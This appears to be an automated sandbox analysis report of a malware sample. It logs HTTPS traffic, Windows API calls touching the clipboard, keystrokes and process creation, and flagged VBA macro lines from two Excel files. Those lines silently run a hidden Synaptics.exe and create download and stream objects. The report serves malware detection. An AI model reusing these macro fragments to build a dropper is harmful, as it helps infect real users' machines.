                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49713 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49724 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49750 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49785 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49784 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49800 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49812 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49815 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49828 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49833 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49848 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49856 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49859 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49870 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49898 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49929 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49935 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49934 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49936 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49945 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49952 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49956 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49966 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003F7099
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_003F7294
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_006C7294
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003F7099
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_003E4342
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0040F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_006DF5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: c2jUHMi5.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ONBQCLYSPU.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: c2jUHMi5.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: ONBQCLYSPU.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: c2jUHMi5.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: ONBQCLYSPU.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: c2jUHMi5.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: ONBQCLYSPU.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_003A29C2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_004102AA NtdllDialogWndProc_W,2_2_004102AA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040E769 NtdllDialogWndProc_W,CallWindowProcW,2_2_0040E769
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040EA4E NtdllDialogWndProc_W,2_2_0040EA4E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_0040EAA6
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BAC99 NtdllDialogWndProc_W,2_2_003BAC99
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0040ECBC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BAD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,2_2_003BAD5C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BAFB4 GetParent,NtdllDialogWndProc_W,2_2_003BAFB4
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_0040EFA8
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F0A1 SendMessageW,NtdllDialogWndProc_W,2_2_0040F0A1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_0040F122
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F37C NtdllDialogWndProc_W,2_2_0040F37C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F3DA NtdllDialogWndProc_W,2_2_0040F3DA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F3AB NtdllDialogWndProc_W,2_2_0040F3AB
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F45A ClientToScreen,NtdllDialogWndProc_W,2_2_0040F45A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F425 NtdllDialogWndProc_W,2_2_0040F425
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0040F5D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040F594 GetWindowLongW,NtdllDialogWndProc_W,2_2_0040F594
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BB7F2 NtdllDialogWndProc_W,2_2_003BB7F2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BB845 NtdllDialogWndProc_W,2_2_003BB845
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040FE80 NtdllDialogWndProc_W,2_2_0040FE80
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_0040FF04
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0040FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_0040FF91
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_006729C2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006E02AA NtdllDialogWndProc_W,9_2_006E02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_006DE769
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DEA4E NtdllDialogWndProc_W,9_2_006DEA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_006DEAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_006DECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068AC99 NtdllDialogWndProc_W,9_2_0068AC99
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068AD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,9_2_0068AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_006DEFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068AFB4 GetParent,NtdllDialogWndProc_W,9_2_0068AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_006DF0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_006DF122
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF37C NtdllDialogWndProc_W,9_2_006DF37C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF3DA NtdllDialogWndProc_W,9_2_006DF3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF3AB NtdllDialogWndProc_W,9_2_006DF3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF45A ClientToScreen,NtdllDialogWndProc_W,9_2_006DF45A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF425 NtdllDialogWndProc_W,9_2_006DF425
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_006DF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_006DF594
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068B7F2 NtdllDialogWndProc_W,9_2_0068B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068B845 NtdllDialogWndProc_W,9_2_0068B845
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DFE80 NtdllDialogWndProc_W,9_2_006DFE80
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_006DFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_006DFF91
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E702F: CreateFileW,DeviceIoControl,CloseHandle,2_2_003E702F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74285590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_003DB9F1
